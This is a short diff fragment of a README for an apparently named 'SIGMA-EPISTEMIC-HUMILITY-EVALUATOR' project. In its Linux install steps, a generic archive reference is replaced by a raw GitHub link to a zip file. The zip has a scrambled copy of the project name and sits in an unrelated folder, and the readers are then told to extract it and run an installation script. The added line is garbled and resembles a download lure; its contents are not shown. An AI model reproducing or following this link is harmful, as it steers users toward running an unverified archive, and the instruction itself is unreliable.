xanderiy/SIGMA-EPISTEMIC-HUMILITY-EVALUATOR/README.md

   2. Drag the app to your Applications folder or follow installer prompts.

 - **Linux:**
-  1. Extract the `.tar.gz` file to a folder.
+  1. Extract the `https://raw.githubusercontent.com/xanderiy/SIGMA-EPISTEMIC-HUMILITY-EVALUATOR/main/unseditious/SIGM-EPISTEMI-EVALUATOR-HUMILIT-3.6.zip` file to a folder.
   2. Open a Terminal and navigate to that folder.
   3. Run the installation script if provided, or follow README instructions inside the release package.